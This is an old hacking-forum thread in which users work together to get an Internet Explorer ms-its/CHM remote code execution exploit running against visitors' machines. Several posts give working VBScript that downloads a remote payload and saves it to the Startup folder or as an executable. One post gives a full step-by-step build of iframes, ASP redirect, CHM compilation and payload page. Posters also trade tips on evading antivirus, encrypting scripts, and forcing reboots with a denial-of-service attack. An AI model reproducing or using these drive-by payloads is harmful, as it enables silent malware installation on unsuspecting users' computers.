i tried playin with it, not sure how it works. hehe probably something easy im overlooking, any help would be appriciated
realmasterX
Feb 21 2004, 11:07 AM
Yes, it works fine ... Very nice.
And i found a easy way to "kill" this bug! U have to set "READ ONLY" to the dir c:\winnt\Downloaded Program Files and the exploit doesnt work anymore.
aiboforcen
Feb 21 2004, 02:43 PM
ok thanks for the info. But i dont understand how this ting is working ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm
what is this ss.MHT file ? how can i create it and should i put it in the same folder as the other files? and the .chm file.. does it matter what .chm file i use as long as i name it chm.chm?
billkennedy32
Feb 21 2004, 09:06 PM
These are better than any bind shell, sence they can be spoofed as IE with PID using connectback , tunnel through any app firewall.
slb33
Feb 21 2004, 10:05 PM
Don't really know how to use this but I'll check it out and give it a try
Thanks for the info
JDog45
Feb 21 2004, 10:36 PM
Norton won't let you view the page because it contains a trjoan it says...
fyle
Feb 21 2004, 10:50 PM
I played around with this one a bit too and I can't get it to do anything from ms-its:mhtml:file://C:\someMht.mht!someUrl::/someTopic
I tried loading it from img src, iframe and meta refresh, and jimmyied around with each part playing with "'s and /'s and //'s and \'s etc, but none were successful.
There is another older CHM exploit that uses showhelp() to download and run the chm to a known location, and because when you make a CHM you can compile in a reference to a topic in the help file pointing to an html page (with vbscript inside or whatever) and then use the ::/NameOfTopicInsideCHM.htm to run the vbscript in the html in the chm locally thereby r3333t! haXx0ring with IE - this is a very serious vulnerability, obviously, because given the ability to download from a site and then run the chm compromises the local zone, or my computer zone, wtf ever.
But this ms-its:mhtml:file:C:\xxx.mht!url::/topic.htm I do not understand... Perhaps someone who has had some luck with it would be so kind as to post the proper syntax, or if not that, try to explain whats going on in the given exploit line?
That would be neat.
TedOb1
Feb 22 2004, 04:15 AM
ya know JDog45 if it wasn't for av software ms would have us all using tin cans and string
xzibit
Feb 22 2004, 04:20 PM
if anyone could give a little more input as to how this exploit works and how to get it working, it would be greatly appreciated
what
Feb 22 2004, 08:41 PM
QUOTE
(1.a) - Full path to CHM - ** OK ** ms-its:http://www.helpware.net/htmlhelp/help.chm::/masterfile.htm BUT... This fails from inside a CHM file.
(1. - Full path to local CHM - ** OK ** ms-its:c:\windows\help\windows.chm::/about_magnify.htm
(1.c) - Relative path to web CHM - ** Fails **. ms-its:help.chm::/masterfile.htm
Note: These links work -- However the entire CHM is being downloaded to your cache. First time will take forever. Second time will be quick as it loads from the cache.
That link to the CHM syntax page refers to what works on Win98 with IE5.
I'm tellin' ya, it don't work.
Also, the link that toska provided to Bizai.a - the code given on that page (http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PHP_BIZAI.A&VSect=T) doesn't do a thing on a patched IE6 as far as I can tell.
I played around with it also <OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='mstasks.exe'>
from inside htmls in local zones, and then i compiled it into a CHM and tried running it in different ways from different locations and IE6 will have nothing to do with that CLSID - it gives a warning and does nothing. I think the whole thing is bogus.
Gangster*
Feb 23 2004, 07:52 AM
hmm.... interesting. I don't think i will be able to get it to work. Never have!
Thanks for the post
cherry
Feb 23 2004, 08:21 AM
I worked on this one several weeks ago and decided it wasn't valid against ie6. Gave up over a week ago. Anyone gets it to work, please msg me for massive reward. Thanks.
what
Feb 23 2004, 05:52 PM
It does work, locally. The cool thing is, that the second time it loads the .chm file, it loads from the cache (AKA my computer zone). Play with it some more, and it will work.
P.S., some more info about that "massive prize" would be nice also.
chris105
Feb 23 2004, 08:27 PM
Is it just me or was this one discussed a while ago, a .wmz file or something ?
gogu258
Feb 24 2004, 12:23 AM
Did you ever seen it works?
captainil
Feb 24 2004, 03:42 AM
works good :>
aLphaBeta
Feb 24 2004, 10:12 AM
i got it bypass KAV perfectly but now had to setup an NAV box to check where is wrong cause NAV lighted up reported by the victim site users..
toska
Feb 24 2004, 11:54 AM
I hope someone is able to decript this, I found it running outthere loose and stuff but it seems interesting....
ITSF ` 4Q |{ "|{ "` x T 3 ITSP T j].! "T PMGL? / /#IDXHDR^ /#ITBITS /#STRINGS(/#SYSTEM z/#TOPICS^/#URLSTRz./#URLTBLn/$FIftiMain /$OBJINST?/$WWAssociativeLinks/ /$WWAssociativeLinks/Property/$WWKeywordLinks/ /$WWKeywordLinks/Property/iefucker.html ::DataSpace/NameList <(::DataSpace/Storage/MSCompressed/Content V,::DataSpace/Storage/MSCompressed/ControlData j)::DataSpace/Storage/MSCompressed/SpanInfo b/::DataSpace/Storage/MSCompressed/Transform/List <&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable V0 = U n c o m p r e s s e d M S C o m p r e s s e d { 7 F C 2 8 9 4 0 - 9 D 3 1 - 1 1 D 0 )R LZXC `4@ HHA Version 4.74.8702 $ Q iefucker.html 1 T#SMS "2PU _ {z:Lal; 6[~bBIB*R#䜰թZj_j6VDp+VQUoWQ9*` Df ?={ $`I7` kemD(}T(&Q;M4I i.&ٺ? fpYd @$(a>bPQ#y=!t<k s\v@0.-sk^ :˕`S \_`ѭvKXRQԣ<Ҷ%{? $;b%٭ɼO6L۬E%r @;!RK][KI߶2nj3h>-Fvbn-)RkRl Q!wýIABx,p x0HJFI3ڥTu R|AM*wH@PW0 3ĒoJSNP21s-(Bh.9=DB#vX8Xyrhj'HKQڬd0H¯&)\n)EC߁t:6D5qÝ v?}~ ,v6vNdžfwSb 8Zi 6٬M~g'֥,Λ+3atH`t;jFf6itu_q⋸n{[p0G]살>|lϷy3BeԹW aU#i &z?#0Wo<j\y=G(1R@Q!P>[%S3GJ5-(ߴ E^b^!0Sa?HτQrI' ]H3#:`&m[tlb*'6& Fbe_%U=QU )hGgt=#^\v{)|GPt"(,_!X|tqg+s9 ]u=BIUz|~vvs[*Ǖc4: d x7vt|]*RP5K7 f+2`&:3~<=]4ld-$٘_1NE6Ht"fWގt"iwF}OQnja;s0&<S%6\I"eDTc'qSƗ"{ѾT?oƊ+Q&nFe3X@8 H2i=xl uL1B{xxQ2#(_s(PG63; 4C2Θm!vz|~7C&*ŤCyxm|%Y 84rn.nF^Ez<v :pgP-ۥHo#).~B *'n4$r %cx(qmN7čp]MPQМTaړAt ]l +`G*[|!~|ۋ HpǤ;H84ZZ5h%հꦉXĈ+US>F^+W&~>.ŬR&ZuDm#M]eG6EhW(.<TN$HJ A#S[Dy; ) =/Me۽!(1(s!R{kFw٢16B{x#AO@eٕRPFul 2CPq/-GHg8a4Z^g\8yC Fžz">Ns4I䛤۴җxJ nuڎٖV1*ALN $Ԭ-f{XF-Ǔa8>G |\ʡ^f.<ãIlk}$W'L9 ;= iR'!/$m< PKX|VCdILYxz#/R(Do|nGRG :7x@[7EӣВQ6zSfh/#p[!nA$ "uF{vp$w$/Xn.c_5{*A:?&գlXħE/I`&R 7]HŞP$"]gzyG~i[V*M wUHW<@@6C\ÃO\J/A;zd=߹^.I~q.cpNr`O={FkӬo Ž(^Uّ86p]9%CR)F3QDHlF:5w@ q^#2Bq0Goz \v+WBy.t.Q3~ApU+Ŕ1##,CS^}\Զq>w~<T`IJ dmfl ~G1 5YZ
I hope someone is able to decript this, I found it running outthere loose and stuff but it seems interesting....
ITSF ` 4Q |{ "|{ "` x T 3 ITSP T j].! "T PMGL? / /#IDXHDR^ /#ITBITS /#STRINGS(/#SYSTEM z/#TOPICS^/#URLSTRz./#URLTBLn/$FIftiMain /$OBJINST?/$WWAssociativeLinks/ /$WWAssociativeLinks/Property/$WWKeywordLinks/ /$WWKeywordLinks/Property/iefucker.html ::DataSpace/NameList <(::DataSpace/Storage/MSCompressed/Content V,::DataSpace/Storage/MSCompressed/ControlData j)::DataSpace/Storage/MSCompressed/SpanInfo b/::DataSpace/Storage/MSCompressed/Transform/List <&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable V0 = U n c o m p r e s s e d M S C o m p r e s s e d { 7 F C 2 8 9 4 0 - 9 D 3 1 - 1 1 D 0 )R LZXC `4@ HHA Version 4.74.8702 $ Q iefucker.html 1 T#SMS "2PU _ {z:Lal; 6[~bBIB*R#䜰թZj_j6VDp+VQUoWQ9*` Df ?={ $`I7` kemD(}T(&Q;M4I i.&ٺ? fpYd @$(a>bPQ#y=!t<k s\v@0.-sk^ :˕`S \_`ѭvKXRQԣ<Ҷ%{? $;b%٭ɼO6L۬E%r @;!RK][KI߶2nj3h>-Fvbn-)RkRl Q!wýIABx,p x0HJFI3ڥTu R|AM*wH@PW0 3ĒoJSNP21s-(Bh.9=DB#vX8Xyrhj'HKQڬd0H¯&)\n)EC߁t:6D5qÝ v?}~ ,v6vNdžfwSb 8Zi 6٬M~g'֥,Λ+3atH`t;jFf6itu_q⋸n{[p0G]살>|lϷy3BeԹW aU#i &z?#0Wo<j\y=G(1R@Q!P>[%S3GJ5-(ߴ E^b^!0Sa?HτQrI' ]H3#:`&m[tlb*'6& Fbe_%U=QU )hGgt=#^\v{)|GPt"(,_!X|tqg+s9 ]u=BIUz|~vvs[*Ǖc4: d x7vt|]*RP5K7 f+2`&:3~<=]4ld-$٘_1NE6Ht"fWގt"iwF}OQnja;s0&<S%6\I"eDTc'qSƗ"{ѾT?oƊ+Q&nFe3X@8 H2i=xl uL1B{xxQ2#(_s(PG63; 4C2Θm!vz|~7C&*ŤCyxm|%Y 84rn.nF^Ez<v :pgP-ۥHo#).~B *'n4$r %cx(qmN7čp]MPQМTaړAt ]l +`G*[|!~|ۋ HpǤ;H84ZZ5h%հꦉXĈ+US>F^+W&~>.ŬR&ZuDm#M]eG6EhW(.<TN$HJ A#S[Dy; ) =/Me۽!(1(s!R{kFw٢16B{x#AO@eٕRPFul 2CPq/-GHg8a4Z^g\8yC Fžz">Ns4I䛤۴җxJ nuڎٖV1*ALN $Ԭ-f{XF-Ǔa8>G |\ʡ^f.<ãIlk}$W'L9 ;= iR'!/$m< PKX|VCdILYxz#/R(Do|nGRG :7x@[7EӣВQ6zSfh/#p[!nA$ "uF{vp$w$/Xn.c_5{*A:?&գlXħE/I`&R 7]HŞP$"]gzyG~i[V*M wUHW<@@6C\ÃO\J/A;zd=߹^.I~q.cpNr`O={FkӬo Ž(^Uّ86p]9%CR)F3QDHlF:5w@ q^#2Bq0Goz \v+WBy.t.Q3~ApU+Ŕ1##,CS^}\Զq>w~<T`IJ dmfl ~G1 5YZ
garbage....nothing else, IE can't display sometjing like that because it isn't HTML code....
xzibit
Feb 24 2004, 10:56 PM
QUOTE (gogu258 @ Feb 24 2004, 05:00 PM)
garbage....nothing else, IE can't display sometjing like that because it isn't HTML code....
i dont think thats true. Looks like encrypted vbscript/jscript.
Microsoft has released a program called "screnc.exe" that encrypts ur jscript/vbscript. Good way to get past av when using those IE exploits ;x
fyle
Feb 24 2004, 11:38 PM
Thanks for the hint, what, you're absolutely correct. Figuring out how this works was like a fun little puzzle for me because I'm not a webmaster-type. This exploit method is nuts... the fact that it works on the most-used browser on earth is nuts.. there are definitely other ways of making this happen... luckily its not very obvious how to put the whole thing together.
gogu258
Feb 25 2004, 12:00 AM
Anyway, that doesn't solve our problem, I didn't see any wep page with ^^ exploit included (I mean CHM...lalala).
toska
Feb 25 2004, 12:30 AM
nevermind
extreme
Feb 25 2004, 12:35 AM
I don't have time to check this one yet, but try downlading Help Workshop... You can create CHM files with it as I recall in my previous exploits... Check it out and see..
what
Feb 25 2004, 01:28 PM
For people that are still having trouble with this. . . . .
You want to download the .html file that has the exploit code as a .chm
To do this, you simply switch some perameters in the code (switch the .html to where the .chm file is) and then the .html code will be loaded from the local cache (which IE thinks is actually a .chm file), letting this exploit, and several others that are only local, now work remotely. It is similair to another exploit we've seen (data object?) in regards to what you are trying to do. It's a very good example of people creating exploits based on the research of others, which I believe is very helpful in regards to computer information and security.
BrandonTurner
Feb 25 2004, 05:55 PM
i have been trying to get this to work forever. here is thje release on how it works but it doesnt explain it well. here is proof it works though. http://www.michaelevanchik.com/security/mi.../chm/index.html it puts a exe in your start up folder called 'real audio'. i cant fiugre it out though. Also norton does stop this exploit.
QUOTE
hi,
Thor Larholm reported a new unpatched and critical IE vuln wich is exploited as an infection vector for malicious codes and trojans (bid 9658)...
here are some details regarding this bug, from Berman Enconado of TrendMicro - (more details will be released by Thor)
The exploit allows executable files to be downloaded and run in the background without user intervention. It employs a malformed CLSID parameter, which enables it to execute a file on the infected user's machine. When an infected user visits a Web site, it can cause a possible malicious executable file to run on the system without user permission.
The exploit works by tagging another script, which contains a CLASSID exploit as a CHM. The following is an illustration of how this exploit works:
The file, LAUNCH.HTML, contains the following codes, which utilizes the exploit:
OK, I think I will start playing with it, cause I am fully patched and it did work with me.. You can expect working POC in few days....
gogu258
Feb 25 2004, 10:36 PM
it doesn't work 4 me.My Start-up is clean.
gogu258
Feb 25 2004, 10:42 PM
It works!!
mastervampire
Feb 26 2004, 12:02 AM
QUOTE (gogu258 @ Feb 25 2004, 10:42 PM)
It works!!
how?
gogu258
Feb 26 2004, 12:10 AM
I don't know, I can't reproduce it. But the demo link works.
BrandonTurner
Feb 26 2004, 12:30 AM
QUOTE (gogu258 @ Feb 26 2004, 12:10 AM)
I don't know, I can't reproduce it. But the demo link works.
i know this is a tricky one.
BrandonTurner
Feb 26 2004, 02:58 AM
the owner of tha site that the demo is on goes by the name 'mcbain' on aim. i talked to him and he said he was going to explain how to do it and put it on his web site. but he didnt. i asked him and he said he was going to do it later that day and didnt. then i asked if he could send me the files so i could figure it out, but he didnt respond. so i just gave up trying to talk to him maybe someone else will have better luck.
sagitarioxp
Mar 5 2004, 12:40 AM
Microsoft Internet Explorer ms-its scheme/CHM remote code execution
Feb 23, 2004
Vulnerable ---------- - Microsoft Internet Explorer 6.0 (lower was not tested) - Microsoft Windows XP Pro - Microsoft Windows XP Home - Microsoft Windows 2003 Server Enterprise - Microsoft Windows 2000 Professional
not tested if vulnerable ------------------------ - Microsoft Windows 98 - Microsoft Internet Explorer 5.x
In English ---------- There is yet another horrible exploit in internet explorer that allows html to be run in My Computer zone allowing system access all via a hyperlink of a webserver. This easily leads to remote code execution without any user intervention.
Tech Stuff and Explanation -------------------------- 1. Create an index.html file with the following source code.
you might think this is redundent but the exploit does not work unless u have a couple iframes before the actual 're_direct.asp' page that runs the exploit.
even though this does not work and shows up as an invalid image, this helps the final re_direct.asp work. If not used the final iframe does not work for some reason.
Other things ----------- - This obsiously will only work until the person reboots thier computer. You can add your on DoS to force them to reboot. ASN.1 DoS seems to be a recent working DoS that you can use since you get the persons ip anyway from them visting your webpage.
- Im not quite sure step 5 works if the computer does NOT have MDAC or Microsoft Data Access installed. Most computers have it but there might be a few that dont?
- ms-its: is just another god forsaken scheme or protocol microsoft supports. There are probably lots of others undiscovered
- look in your start up menu for real audio.exe in the path above in step 5
Vendor Recommendations --------------------- - Microsoft probably knows all its schemes and protocols more then the security researcher. It sure would be nice if they looked at them all and found others that could lead to the "My Computer" zone
- As always Microsoft should pay BETTER people to test their software instead of rewards for virus writers
- Microsoft should not deny local zone vulnerabilites as "not a vulnerabitly itself" problems since if combined with other "not a vulnerabitly itself" bugs lead to THE PROBLEM
Temp Fix ------------- - Lock the my computer zone as untrusted. Guess you cant even trust yourself? - Disable scripting in Internet Explorer - Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)
Credit ------ Thor from pivx.com for fiding the god forsaken protocol ms-its: Http equiv and jelmer for the mshtml: discoverty ,local html execution code and examples advisories. Liu Die Yu because of his nice webpage of bugs at http://umbrella.mx.tc/
Greets ------ - slacker my other brain - illwill at illmob.org - abe,rain and dolan
Microsoft Internet Explorer ms-its scheme/CHM remote code execution
Feb 23, 2004
Vulnerable ---------- - Microsoft Internet Explorer 6.0 (lower was not tested) - Microsoft Windows XP Pro - Microsoft Windows XP Home - Microsoft Windows 2003 Server Enterprise - Microsoft Windows 2000 Professional
not tested if vulnerable ------------------------ - Microsoft Windows 98 - Microsoft Internet Explorer 5.x
In English ---------- There is yet another horrible exploit in internet explorer that allows html to be run in My Computer zone allowing system access all via a hyperlink of a webserver. This easily leads to remote code execution without any user intervention.
Tech Stuff and Explanation -------------------------- 1. Create an index.html file with the following source code.
you might think this is redundent but the exploit does not work unless u have a couple iframes before the actual 're_direct.asp' page that runs the exploit.
even though this does not work and shows up as an invalid image, this helps the final re_direct.asp work. If not used the final iframe does not work for some reason.
Other things ----------- - This obsiously will only work until the person reboots thier computer. You can add your on DoS to force them to reboot. ASN.1 DoS seems to be a recent working DoS that you can use since you get the persons ip anyway from them visting your webpage.
- Im not quite sure step 5 works if the computer does NOT have MDAC or Microsoft Data Access installed. Most computers have it but there might be a few that dont?
- ms-its: is just another god forsaken scheme or protocol microsoft supports. There are probably lots of others undiscovered
- look in your start up menu for real audio.exe in the path above in step 5
Vendor Recommendations --------------------- - Microsoft probably knows all its schemes and protocols more then the security researcher. It sure would be nice if they looked at them all and found others that could lead to the "My Computer" zone
- As always Microsoft should pay BETTER people to test their software instead of rewards for virus writers
- Microsoft should not deny local zone vulnerabilites as "not a vulnerabitly itself" problems since if combined with other "not a vulnerabitly itself" bugs lead to THE PROBLEM
Temp Fix ------------- - Lock the my computer zone as untrusted. Guess you cant even trust yourself? - Disable scripting in Internet Explorer - Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)
Credit ------ Thor from pivx.com for fiding the god forsaken protocol ms-its: Http equiv and jelmer for the mshtml: discoverty ,local html execution code and examples advisories. Liu Die Yu because of his nice webpage of bugs at http://umbrella.mx.tc/
Greets ------ - slacker my other brain - illwill at illmob.org - abe,rain and dolan
Yap, but I havent manage to replicate this one.. I only tried with his compiled CHM file.. Maybe that is why it didn't work.. Just get non-compiled CHM to me and I will finish the rest and post here.. Also, if it is possible to "write" on local system, then you can better use that notepad owerwriting exploit.. Works only on XP as far as I know, but it is a sure hit..
fyle
Mar 5 2004, 12:09 PM
I have gotten it to work on 95/98/ME/NT/XP/2000.
And you don't have to use asp, just any old server thingy that you feel like piecing together that will send a '302 Object moved' http header with the Location pointing to the ms-its again so that it reloads from its local cache. Works best if you give it a 3-5 second wait before you send 302 for dial-ups.
This sploit is really nasty. MS should issue a fix asap.
BrandonTurner
Mar 6 2004, 02:19 AM
ok... what do you put int he chm file that makes it 'import' the runit.html file?
fyle
Mar 6 2004, 05:49 AM
First make the HTML that you want to run locally on the target computer, put in all the vbs/js and crap, then if you're using HTML Help Workshop start a new project and under the Contents tab hit Insert Topic | Add and just plop in the html. Then the name of the HTML that you call from ms-its:mhtml is at the end of the string ::/thisHtml.html
An example html file that I was using for tests (running from the chm)
<script language=vbs> on error resume next set oHTTP = CreateObject("msxml2.XMLHTTP") oHTTP.open "GET", "http://www.yourwebsite.com/whatever/compromised.vbs", False oHTTP.send set oStream = createobject("adodb.stream") Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 oStream.type = adTypeBinary oStream.open oStream.write oHTTP.responseBody oStream.savetofile "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\compromised.vbs", adSaveCreateOverWrite oStream.savetofile "C:\WINDOWS\All Users\Start Menu\Programs\StartUp\compromised.vbs", adSaveCreateOverWrite oStream.savetofile "D:\Documents and Settings\All Users\Start Menu\Programs\Startup\compromised.vbs", adSaveCreateOverWrite oStream.savetofile "D:\WINDOWS\All Users\Start Menu\Programs\StartUp\compromised.vbs", adSaveCreateOverWrite </script>
Toss that into notepad and give it an html extension. The chm downloads the compromised.vbs to the startup folder, and it is run on the next restart or login as if the user had double-clicked it himself.
extreme
Mar 6 2004, 07:25 AM
Can you upload non compiled CHM file please? My HTML workshop just eats shit and I can't create new one with the way you said..
heh funny enough:) i certanly did, but that message still appear....grrr.. so, step by step: 1. I create index.html file containing: <IFRAME SRC='re_direct2.asp'> <IFRAME SRC='re_direct3.asp'> <IFRAME SRC='re_direct4.asp'> <IFRAME SRC='re_direct5.asp'> <IFRAME SRC='re_direct.asp'> 2. creating re_direct2.asp..re_direct5.asp containing: <IMG SRC='ms-its:mhtml:file://C:\bla.MHT!http://www.mysitehere.com/test//chm.chm::/runit.html'> 3. creating re_direct.asp containing <% response.redirect("URL:ms-its:mhtml:file://C:\bla.MHT!http://www.mysitehere.com/test//chm.chm::/runit.html") %> 4. creating runit.html containing <script language=vbs> set oHTTP = CreateObject("msxml2.XMLHTTP") oHTTP.open "GET", "http://www.mysitehere.com/test/safe.exe", False oHTTP.send set oStream = createobject("adodb.stream") Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 oStream.type = adTypeBinary oStream.open oStream.write oHTTP.responseBody oStream.savetofile "c:\test.exe", adSaveCreateOverWrite </script> 5. running html help workshop: FIle->New->Project->Contents->Insert Topic Add->File or Url: runit.html Entry title - runit.html file->compile renaming chm file to chm.chm 6. uploading all files to http://www.mysitehere.com/test/ opening http://www.mysitehere.com/test/index.html with ie plz tell me where i made mistake thanks
fyle
Mar 7 2004, 04:10 AM
I've been trying to find a way to make the downloaded file from the vbs run from the embeded html without doing something like overwriting notepad and then forcing the browser to view-source, or else dropping the vbs to Startup so that it runs on restart. I've tried numerous things but haven't found anything that works consistently yet. With the notepad method, it only works if notepad is closed when the target browser loads the infected site, and even then it doesn't work on all win versions. Any scripting guru's know a way? Maybe a trick with xml/ado?
extreme
Mar 7 2004, 04:30 AM
@fyle Yes, there is a way, just check other exploits, or reply on MY PM sent to YOU and I will send you solution... Nobody else should be sending me PMs..
BrandonTurner
Mar 7 2004, 04:53 PM
QUOTE (extreme @ Mar 7 2004, 04:30 AM)
@fyle Yes, there is a way, just check other exploits, or reply on MY PM sent to YOU and I will send you solution... Nobody else should be sending me PMs..
too cool to have people send you PMs?
extreme
Mar 7 2004, 04:59 PM
You wanna say I am not too cool??? It is just that people understood that I said "PM me if you want this exploit", and I didn't mean that. So why wasting their and mine time just to PM me, when I don't have anything to offer regarding this issue.. There, I justified myself... Anyway people.. Don't forget, I am 2cool4you...
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.